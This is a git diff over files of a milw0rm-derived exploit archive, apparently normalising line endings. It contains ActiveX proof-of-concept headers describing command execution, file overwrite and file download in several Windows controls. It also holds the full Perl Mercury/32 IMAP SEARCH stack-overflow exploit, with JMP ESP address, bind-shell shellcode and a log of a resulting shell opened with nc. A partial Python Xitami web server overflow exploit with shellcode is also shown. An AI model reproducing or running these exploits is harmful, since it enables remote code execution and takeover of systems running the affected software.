u+=c; + } + memset(str, '\0', sizeof(str)); + timebuffer.time=u; + ctime_s(str, 26, &(timebuffer.time)); + printf("Module time is %.24s (0x%x)\n", str, u); + + v=x; + } while (v!=z); + } + } + + system("pause"); + + WSACleanup(); + return 0; +} + +// 
milw0rm.com [2007-08-17] diff --git a/platforms/windows/remote/431.c b/platforms/windows/remote/431.c index b26801d32..53bd2f61c 100755 --- a/platforms/windows/remote/431.c +++ b/platforms/windows/remote/431.c @@ -389,6 +389,6 @@ ways.\n\n"); unsigned char xor_data(unsigned char byte) { return(byte ^ 0x92); -} - -// milw0rm.com [2004-09-02] +} + +// milw0rm.com [2004-09-02] diff --git a/platforms/windows/remote/4328.html b/platforms/windows/remote/4328.html index cd6753e95..853601645 100755 --- a/platforms/windows/remote/4328.html +++ b/platforms/windows/remote/4328.html @@ -1,102 +1,102 @@ - - - - - - - - -# milw0rm.com [2007-08-28] + that functions are safely scriptable and exploitable by HeapSpray Technique - -Tested : Windows XP Professional SP2 all patched,Internet Explorer 7 - -That functions within this class can only be called if the control believes it is being run from the yahoo.com domain. -> I used "Simple DNS Plus" for manipulating the DNS resolution. - -I saved this file (exploit.htm) into directory root (web server) -and I exploited with link : http://www.yahoo.com/exploit.htm - -coder : minhbq - mail : minhbq1985@gmail.com ---> - - - - - - - - - -# milw0rm.com [2007-09-01] + + + + + + + + + + +# milw0rm.com [2007-09-01] diff --git a/platforms/windows/remote/4357.html b/platforms/windows/remote/4357.html index 2143953a0..d9c250520 100755 --- a/platforms/windows/remote/4357.html +++ b/platforms/windows/remote/4357.html @@ -1,34 +1,34 @@ - - - - - - -# milw0rm.com [2007-09-03] + + + + + + +# milw0rm.com [2007-09-03] diff --git a/platforms/windows/remote/4366.html b/platforms/windows/remote/4366.html index e82207f56..e27629aa7 100755 --- a/platforms/windows/remote/4366.html +++ b/platforms/windows/remote/4366.html @@ -1,52 +1,52 @@ - - - - - - - -# milw0rm.com [2007-09-05] + + + + + + + +# milw0rm.com [2007-09-05] diff --git a/platforms/windows/remote/4372.html b/platforms/windows/remote/4372.html index e7d166a85..892aa3408 100755 
--- a/platforms/windows/remote/4372.html +++ b/platforms/windows/remote/4372.html @@ -1,37 +1,37 @@ - - - -# milw0rm.com [2007-09-07] + + + +# milw0rm.com [2007-09-07] diff --git a/platforms/windows/remote/4388.html b/platforms/windows/remote/4388.html index b1de3b896..0583e4239 100755 --- a/platforms/windows/remote/4388.html +++ b/platforms/windows/remote/4388.html @@ -1,37 +1,37 @@ -
    --------------------------------------------------------------------------------------
    - Ultra Crypto Component (CryptoX.dll <= 2.0) "SaveToFile()" Inscure Method
    - url: http://www.ultrashareware.com/
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    - 
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - all software that use this ocx are vulnerable to this exploits.
    -
    - We can use the "HexString()" method to save into our batch file some lines.
    - In this PoC, I convert "cmd.exe /c notepad.exe" in hexadecimal format, then
    - I save it in a batch file :)
    --------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-09-10] +
    +-------------------------------------------------------------------------------------
    + Ultra Crypto Component (CryptoX.dll <= 2.0) "SaveToFile()" Inscure Method
    + url: http://www.ultrashareware.com/
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    + 
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + all software that use this ocx are vulnerable to this exploits.
    +
    + We can use the "HexString()" method to save into our batch file some lines.
    + In this PoC, I convert "cmd.exe /c notepad.exe" in hexadecimal format, then
    + I save it in a batch file :)
    +-------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-09-10] diff --git a/platforms/windows/remote/4389.html b/platforms/windows/remote/4389.html index 56ee8e9f1..07cbf7002 100755 --- a/platforms/windows/remote/4389.html +++ b/platforms/windows/remote/4389.html @@ -1,81 +1,81 @@ -
    ------------------------------------------------------------------------------------
    - Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit
    - url: http://www.ultrashareware.com/
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    - 
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    - all software that use this ocx are vulnerable to this exploits.
    -
    - Heap Spray Technique was developed by SkyLined
    - (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
    -
    - The "DeleteContext()" is vulnerable too
    ------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-09-10] +
    +-----------------------------------------------------------------------------------
    + Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit
    + url: http://www.ultrashareware.com/
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    + 
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + all software that use this ocx are vulnerable to this exploits.
    +
    + Heap Spray Technique was developed by SkyLined
    + (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)
    +
    + The "DeleteContext()" is vulnerable too
    +-----------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-09-10] diff --git a/platforms/windows/remote/439.c b/platforms/windows/remote/439.c index 3af8cdb14..b93f7d22d 100755 --- a/platforms/windows/remote/439.c +++ b/platforms/windows/remote/439.c @@ -241,6 +241,6 @@ WSACleanup(); return 0; } - - -// milw0rm.com [2004-09-12] + + +// milw0rm.com [2004-09-12] diff --git a/platforms/windows/remote/4393.html b/platforms/windows/remote/4393.html index a97b35446..c38e5c060 100755 --- a/platforms/windows/remote/4393.html +++ b/platforms/windows/remote/4393.html @@ -1,45 +1,45 @@ -
    -------------------------------------------------------------------------------------------------------
    - Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution
    - url: http://www.microsoft.com
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    - 
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    -
    - greetz to: Wiz001 (be safe brotha... and see soon :D)
    -
    - Description:
    - This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
    - "StartProcess()" and "SyncShell()"
    - Using one of them, you'll be able to run every program you like, simply giving to the method the 
    - right argument.
    - In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
    - you like.
    - Anyway, I think you could imagine what impact could have this kind of vulnerability :D
    -
    - Other dangerous methods of this ocx are:
    - "SaveAs()"
    - "CABDefaultURL()"
    - "CABFileName()"
    - "CABRunFile()"
    -------------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-09-11] +
    +------------------------------------------------------------------------------------------------------
    + Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution
    + url: http://www.microsoft.com
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    + 
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +
    + greetz to: Wiz001 (be safe brotha... and see soon :D)
    +
    + Description:
    + This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are:
    + "StartProcess()" and "SyncShell()"
    + Using one of them, you'll be able to run every program you like, simply giving to the method the 
    + right argument.
    + In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything
    + you like.
    + Anyway, I think you could imagine what impact could have this kind of vulnerability :D
    +
    + Other dangerous methods of this ocx are:
    + "SaveAs()"
    + "CABDefaultURL()"
    + "CABFileName()"
    + "CABRunFile()"
    +------------------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-09-11]
diff --git a/platforms/windows/remote/4394.html b/platforms/windows/remote/4394.html
index e74f68c8d..bb3bec2d9 100755
--- a/platforms/windows/remote/4394.html
+++ b/platforms/windows/remote/4394.html
@@ -1,37 +1,37 @@ -
    ----------------------------------------------------------------------------------------------------------
    - Microsoft Visual Studio 6.0 VB To VSI Support Library (VBTOVSI.DLL v. 1.0.0.0) Arbitrary File Overwrite
    - url: http://www.microsoft.com
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    - 
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    -
    - Description:
    - Using the "Load()" method we can load the content of a file from local machine passed as argument to
    - this function and then save it into arbitrary location with the "SaveAs()" method.
    - This allow to overwrite well known files with arbitrary data. I try to pass to the "Load()" method
    - remote directories (http) but, unfortunately, it accepts only local directories.
    ----------------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-09-11] +
    +---------------------------------------------------------------------------------------------------------
    + Microsoft Visual Studio 6.0 VB To VSI Support Library (VBTOVSI.DLL v. 1.0.0.0) Arbitrary File Overwrite
    + url: http://www.microsoft.com
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    + 
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +
    + Description:
    + Using the "Load()" method we can load the content of a file from local machine passed as argument to
    + this function and then save it into arbitrary location with the "SaveAs()" method.
    + This allow to overwrite well known files with arbitrary data. I try to pass to the "Load()" method
    + remote directories (http) but, unfortunately, it accepts only local directories.
    +---------------------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-09-11]
diff --git a/platforms/windows/remote/4398.html b/platforms/windows/remote/4398.html
index b807a2adc..c40c532aa 100755
--- a/platforms/windows/remote/4398.html
+++ b/platforms/windows/remote/4398.html
@@ -1,53 +1,53 @@ - - - - - - - - - - - -# milw0rm.com [2007-09-12] + + + + + + + + + + + +# milw0rm.com [2007-09-12]
diff --git a/platforms/windows/remote/4420.html b/platforms/windows/remote/4420.html
index b3605d601..86ba1f28b 100755
--- a/platforms/windows/remote/4420.html
+++ b/platforms/windows/remote/4420.html
@@ -1,56 +1,56 @@ -
    ------------------------------------------------------------------------------
    - MW6 Technologies QRCode ActiveX 3.0 (MW6QRCode.dll) Remote File Overwrite
    - url: www.mw6tech.com
    -
    - Author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    -
    - Description:
    - This control contains two methods, "SaveAsBMP()" and "SaveAsWMF()", which
    - write to a file specified as an argument.
    - These can be exploited to overwrite and corrupt arbitrary files on the
    - system in the context of the currently logged-on user.
    -
    - Marked as:
    - RegKey Safe for Script: False
    - RegKey Safe for Init: False
    - Implements IObjectSafety: True
    - IDisp Safe: Safe for untrusted: caller,data
    - IPersist Safe: Safe for untrusted: caller,data
    - IPStorage Safe: Safe for untrusted: caller,data
    - KillBitSet: Falso 
    ------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-09-18] +
    +-----------------------------------------------------------------------------
    + MW6 Technologies QRCode ActiveX 3.0 (MW6QRCode.dll) Remote File Overwrite
    + url: www.mw6tech.com
    +
    + Author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +
    + Description:
    + This control contains two methods, "SaveAsBMP()" and "SaveAsWMF()", which
    + write to a file specified as an argument.
    + These can be exploited to overwrite and corrupt arbitrary files on the
    + system in the context of the currently logged-on user.
    +
    + Marked as:
    + RegKey Safe for Script: False
    + RegKey Safe for Init: False
    + Implements IObjectSafety: True
    + IDisp Safe: Safe for untrusted: caller,data
    + IPersist Safe: Safe for untrusted: caller,data
    + IPStorage Safe: Safe for untrusted: caller,data
    + KillBitSet: Falso 
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-09-18]
diff --git a/platforms/windows/remote/4427.html b/platforms/windows/remote/4427.html
index eb300b271..a6b014d77 100755
--- a/platforms/windows/remote/4427.html
+++ b/platforms/windows/remote/4427.html
@@ -1,29 +1,29 @@ - - - - - - - - -# milw0rm.com [2007-09-19] + + + + + + + + +# milw0rm.com [2007-09-19]
diff --git a/platforms/windows/remote/4428.html b/platforms/windows/remote/4428.html
index 5046dbf24..8e7fdf83c 100755
--- a/platforms/windows/remote/4428.html
+++ b/platforms/windows/remote/4428.html
@@ -1,44 +1,44 @@ -
    ------------------------------------------------------------------------------
    - Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download
    - url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe
    -
    - Author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - This was written for educational purpose. Use it at your own risk.
    - Author will be not responsible for any damage.
    -
    - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    -
    - Marked as:
    - RegKey Safe for Script: False
    - RegkeySafe for Init: False
    - KillBitSet: False
    -
    - From remote: depends by Internet Explorer settings
    - From local: yes
    -
    - Description:
    - This contron contains a "GetFile()" method which allows to download, on
    - user's pc, an arbitrary file pased as argument.
    - Remote execution depends by Internet Explorer settings, local execution
    - works very well.
    -
    - greetz to: skyhole (or YAG KOHHA) for inspiration
    ------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-09-19] +
    +-----------------------------------------------------------------------------
    + Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download
    + url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe
    +
    + Author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not responsible for any damage.
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    +
    + Marked as:
    + RegKey Safe for Script: False
    + RegkeySafe for Init: False
    + KillBitSet: False
    +
    + From remote: depends by Internet Explorer settings
    + From local: yes
    +
    + Description:
    + This contron contains a "GetFile()" method which allows to download, on
    + user's pc, an arbitrary file pased as argument.
    + Remote execution depends by Internet Explorer settings, local execution
    + works very well.
    +
    + greetz to: skyhole (or YAG KOHHA) for inspiration
    +-----------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-09-19]
diff --git a/platforms/windows/remote/4429.pl b/platforms/windows/remote/4429.pl
index fad68fed3..3ad4c11b1 100755
--- a/platforms/windows/remote/4429.pl
+++ b/platforms/windows/remote/4429.pl 
@@ -1,132 +1,132 @@ -# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org -# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit -# Found & Code by void# ph4nt0m.org -# -# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready. -# C: pst06 LOGIN void ph4nt0m.org -# S: pst06 OK LOGIN completed. -# C: pst06 SELECT INBOX -# S: * 0 EXISTS -# S: * 0 RECENT -# S: * FLAGS (\Deleted \Draft \Seen \Answered) -# S: * OK [UIDVALIDITY 1190225819] UID Validity -# S: * OK [UIDNEXT 1] Predicted next UID -# S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag -# s -# S: pst06 OK [READ-WRITE] SELECT completed. -# [*] Send Evil Payload ... -# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P -# -# Z:\Exp>nc -vv 127.0.0.1 31337 -# DNS fwd/rev mismatch: localhost != GNU -# localhost [127.0.0.1] 31337 (?) open -# Microsoft Windows XP [°æ±¾ 5.1.2600] -# (C) °æÈ¨ËùÓÐ 1985-2001 Microsoft Corp. -# -# e:\MERCURY>whoami -# whoami -# Administrator -# -# e:\MERCURY> - -use strict; -use warnings; -use IO::Socket; - -# Target IP -my $imap_host = shift || 127.0.0.1; -my $imap_port = shift || 143; -my $imap_user = shift || "void"; -my $imap_pass = shift || "ph4nt0m.org"; - -my $banner = -" Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit\n". -" Found & Code by void#ph4nt0m.org\n". -"\n"; - -my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org"; -my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 CHS Universe - -# /* win32_bind - EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */ -# bad char: 0x00 0x0A 0x0D 0x20 0x29 -my $shellcode = -"\x31\xc9\x81\xe9\xb0\xff\xff\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81". -"\x76\x0e\xfa\xd1\xa5\x6f\x83\xee\xfc\xe2\xf4\x06\xbb\x4e\x22\x12". -"\x28\x5a\x90\x05\xb1\x2e\x03\xde\xf5\x2e\x2a\xc6\x5a\xd9\x6a\x82". -"\xd0\x4a\xe4\xb5\xc9\x2e\x30\xda\xd0\x4e\x26\x71\xe5\x2e\x6e\x14". 
-"\xe0\x65\xf6\x56\x55\x65\x1b\xfd\x10\x6f\x62\xfb\x13\x4e\x9b\xc1". -"\x85\x81\x47\x8f\x34\x2e\x30\xde\xd0\x4e\x09\x71\xdd\xee\xe4\xa5". -"\xcd\xa4\x84\xf9\xfd\x2e\xe6\x96\xf5\xb9\x0e\x39\xe0\x7e\x0b\x71". -"\x92\x95\xe4\xba\xdd\x2e\x1f\xe6\x7c\x2e\x2f\xf2\x8f\xcd\xe1\xb4". -"\xdf\x49\x3f\x05\x07\xc3\x3c\x9c\xb9\x96\x5d\x92\xa6\xd6\x5d\xa5". -"\x85\x5a\xbf\x92\x1a\x48\x93\xc1\x81\x5a\xb9\xa5\x58\x40\x09\x7b". -"\x3c\xad\x6d\xaf\xbb\xa7\x90\x2a\xb9\x7c\x66\x0f\x7c\xf2\x90\x2c". -"\x82\xf6\x3c\xa9\x82\xe6\x3c\xb9\x82\x5a\xbf\x9c\xb9\xdf\x06\x9c". -"\x82\x2c\x8e\x6f\xb9\x01\x75\x8a\x16\xf2\x90\x2c\xbb\xb5\x3e\xaf". -"\x2e\x75\x07\x5e\x7c\x8b\x86\xad\x2e\x73\x3c\xaf\x2e\x75\x07\x1f". -"\x98\x23\x26\xad\x2e\x73\x3f\xae\x85\xf0\x90\x2a\x42\xcd\x88\x83". -"\x17\xdc\x38\x05\x07\xf0\x90\x2a\xb7\xcf\x0b\x9c\xb9\xc6\x02\x73". -"\x34\xcf\x3f\xa3\xf8\x69\xe6\x1d\xbb\xe1\xe6\x18\xe0\x65\x9c\x50". -"\x2f\xe7\x42\x04\x93\x89\xfc\x77\xab\x9d\xc4\x51\x7a\xcd\x1d\x04". -"\x62\xb3\x90\x8f\x95\x5a\xb9\xa1\x86\xf7\x3e\xab\x80\xcf\x6e\xab". -"\x80\xf0\x3e\x05\x01\xcd\xc2\x23\xd4\x6b\x3c\x05\x07\xcf\x90\x05". -"\xe6\x5a\xbf\x71\x86\x59\xec\x3e\xb5\x5a\xb9\xa8\x2e\x75\x07\x15". -"\x1f\x45\x0f\xa9\x2e\x73\x90\x2a\xd1\xa5\x6f"; - - - -print $banner; -sleep(1); - -my $sock = IO::Socket::INET->new( PeerHost=>$imap_host, PeerPort=>$imap_port, proto=>"tcp" ) or die "Connect error.\n"; -imap_recv(""); - -imap_send("pst06 LOGIN $imap_user $imap_pass\r\n", "rv"); -imap_send("pst06 SELECT INBOX\r\n", "rv"); - -my $payload = $cheers.$jmpesp.$shellcode; -print "[*] Send Evil Payload ...\n"; -imap_send("pst06 SEARCH ON $payload\r\n", ""); -sleep(1); -print "[+] Done! Check out cmdshell\@$imap_host:31337. Good Luck :-P\n"; -$sock->close(); - - -sub imap_send -{ - if($_[1] =~ /v/) - { - if(length($_[0])<=75) - { - print "C: ".$_[0]; - } - else - { - print "C: ".substr($_[0], 0, 36)." ... 
".substr($_[0], -36, -1)."\n"; - } - } - - print $sock $_[0]; - - if($_[1] =~ /r/) - { - imap_recv(substr($_[0], 0, index($_[0], " ")+1)); - } -} - - -sub imap_recv -{ - while(<$sock>) - { - print "S: ".$_; - if($_ =~ /$_[0]OK/) - { last; } - elsif($_ =~ /$_[0]NO|$_[0]BAD/ ) - { last; } - else - { next; } - } -} - -# milw0rm.com [2007-09-19] +# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org +# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit +# Found & Code by void# ph4nt0m.org +# +# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready. +# C: pst06 LOGIN void ph4nt0m.org +# S: pst06 OK LOGIN completed. +# C: pst06 SELECT INBOX +# S: * 0 EXISTS +# S: * 0 RECENT +# S: * FLAGS (\Deleted \Draft \Seen \Answered) +# S: * OK [UIDVALIDITY 1190225819] UID Validity +# S: * OK [UIDNEXT 1] Predicted next UID +# S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag +# s +# S: pst06 OK [READ-WRITE] SELECT completed. +# [*] Send Evil Payload ... +# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P +# +# Z:\Exp>nc -vv 127.0.0.1 31337 +# DNS fwd/rev mismatch: localhost != GNU +# localhost [127.0.0.1] 31337 (?) open +# Microsoft Windows XP [°æ±¾ 5.1.2600] +# (C) °æÈ¨ËùÓÐ 1985-2001 Microsoft Corp. +# +# e:\MERCURY>whoami +# whoami +# Administrator +# +# e:\MERCURY> + +use strict; +use warnings; +use IO::Socket; + +# Target IP +my $imap_host = shift || 127.0.0.1; +my $imap_port = shift || 143; +my $imap_user = shift || "void"; +my $imap_pass = shift || "ph4nt0m.org"; + +my $banner = +" Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit\n". +" Found & Code by void#ph4nt0m.org\n". 
+"\n"; + +my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org"; +my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 CHS Universe + +# /* win32_bind - EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */ +# bad char: 0x00 0x0A 0x0D 0x20 0x29 +my $shellcode = +"\x31\xc9\x81\xe9\xb0\xff\xff\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81". +"\x76\x0e\xfa\xd1\xa5\x6f\x83\xee\xfc\xe2\xf4\x06\xbb\x4e\x22\x12". +"\x28\x5a\x90\x05\xb1\x2e\x03\xde\xf5\x2e\x2a\xc6\x5a\xd9\x6a\x82". +"\xd0\x4a\xe4\xb5\xc9\x2e\x30\xda\xd0\x4e\x26\x71\xe5\x2e\x6e\x14". +"\xe0\x65\xf6\x56\x55\x65\x1b\xfd\x10\x6f\x62\xfb\x13\x4e\x9b\xc1". +"\x85\x81\x47\x8f\x34\x2e\x30\xde\xd0\x4e\x09\x71\xdd\xee\xe4\xa5". +"\xcd\xa4\x84\xf9\xfd\x2e\xe6\x96\xf5\xb9\x0e\x39\xe0\x7e\x0b\x71". +"\x92\x95\xe4\xba\xdd\x2e\x1f\xe6\x7c\x2e\x2f\xf2\x8f\xcd\xe1\xb4". +"\xdf\x49\x3f\x05\x07\xc3\x3c\x9c\xb9\x96\x5d\x92\xa6\xd6\x5d\xa5". +"\x85\x5a\xbf\x92\x1a\x48\x93\xc1\x81\x5a\xb9\xa5\x58\x40\x09\x7b". +"\x3c\xad\x6d\xaf\xbb\xa7\x90\x2a\xb9\x7c\x66\x0f\x7c\xf2\x90\x2c". +"\x82\xf6\x3c\xa9\x82\xe6\x3c\xb9\x82\x5a\xbf\x9c\xb9\xdf\x06\x9c". +"\x82\x2c\x8e\x6f\xb9\x01\x75\x8a\x16\xf2\x90\x2c\xbb\xb5\x3e\xaf". +"\x2e\x75\x07\x5e\x7c\x8b\x86\xad\x2e\x73\x3c\xaf\x2e\x75\x07\x1f". +"\x98\x23\x26\xad\x2e\x73\x3f\xae\x85\xf0\x90\x2a\x42\xcd\x88\x83". +"\x17\xdc\x38\x05\x07\xf0\x90\x2a\xb7\xcf\x0b\x9c\xb9\xc6\x02\x73". +"\x34\xcf\x3f\xa3\xf8\x69\xe6\x1d\xbb\xe1\xe6\x18\xe0\x65\x9c\x50". +"\x2f\xe7\x42\x04\x93\x89\xfc\x77\xab\x9d\xc4\x51\x7a\xcd\x1d\x04". +"\x62\xb3\x90\x8f\x95\x5a\xb9\xa1\x86\xf7\x3e\xab\x80\xcf\x6e\xab". +"\x80\xf0\x3e\x05\x01\xcd\xc2\x23\xd4\x6b\x3c\x05\x07\xcf\x90\x05". +"\xe6\x5a\xbf\x71\x86\x59\xec\x3e\xb5\x5a\xb9\xa8\x2e\x75\x07\x15". 
+"\x1f\x45\x0f\xa9\x2e\x73\x90\x2a\xd1\xa5\x6f"; + + + +print $banner; +sleep(1); + +my $sock = IO::Socket::INET->new( PeerHost=>$imap_host, PeerPort=>$imap_port, proto=>"tcp" ) or die "Connect error.\n"; +imap_recv(""); + +imap_send("pst06 LOGIN $imap_user $imap_pass\r\n", "rv"); +imap_send("pst06 SELECT INBOX\r\n", "rv"); + +my $payload = $cheers.$jmpesp.$shellcode; +print "[*] Send Evil Payload ...\n"; +imap_send("pst06 SEARCH ON $payload\r\n", ""); +sleep(1); +print "[+] Done! Check out cmdshell\@$imap_host:31337. Good Luck :-P\n"; +$sock->close(); + + +sub imap_send +{ + if($_[1] =~ /v/) + { + if(length($_[0])<=75) + { + print "C: ".$_[0]; + } + else + { + print "C: ".substr($_[0], 0, 36)." ... ".substr($_[0], -36, -1)."\n"; + } + } + + print $sock $_[0]; + + if($_[1] =~ /r/) + { + imap_recv(substr($_[0], 0, index($_[0], " ")+1)); + } +} + + +sub imap_recv +{ + while(<$sock>) + { + print "S: ".$_; + if($_ =~ /$_[0]OK/) + { last; } + elsif($_ =~ /$_[0]NO|$_[0]BAD/ ) + { last; } + else + { next; } + } +} + +# milw0rm.com [2007-09-19] diff --git a/platforms/windows/remote/4445.html b/platforms/windows/remote/4445.html index c2a35329d..2c3c3142e 100755 --- a/platforms/windows/remote/4445.html +++ b/platforms/windows/remote/4445.html @@ -1,46 +1,46 @@ - - -pwnin'... - - - - - -# milw0rm.com [2007-09-23] + + +pwnin'... + + + + + +# milw0rm.com [2007-09-23] diff --git a/platforms/windows/remote/4450.py b/platforms/windows/remote/4450.py index 229959a80..45a74e901 100755 --- a/platforms/windows/remote/4450.py +++ b/platforms/windows/remote/4450.py 
@@ -1,64 +1,64 @@ -#!/usr/bin/python -# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit -# Bug discovered by Krystian Kloskowski (h07) -# Tested on: Xitami 2.5c2 / XP SP2 Polish -# Shellcode: Windows Execute Command (calc) -# Details:.. -# -# [Module xigui32.exe] -# If-Modified-Since: Evil, ["A" * 76]\r\n -# EIP 41414141 -# -# [Module xitami.exe] -# If-Modified-Since: Evil, ["A" * 104]\r\n -# EIP 41414141 -# -# Product Homepage: http://www.xitami.com/ -# Just for fun ;) -## - -from struct import pack -from time import sleep -from socket import * - -host = "192.168.0.1" -port = 80 - -shellcode = ( -"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6" -"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7" -"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58" -"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae" -"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60" -"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf" -"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70" -"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33" -"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04" -"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2") - -opcode = pack(" +# Tested on: Xitami 2.5c2 / XP SP2 Polish +# Shellcode: Windows Execute Command (calc) +# Details:.. 
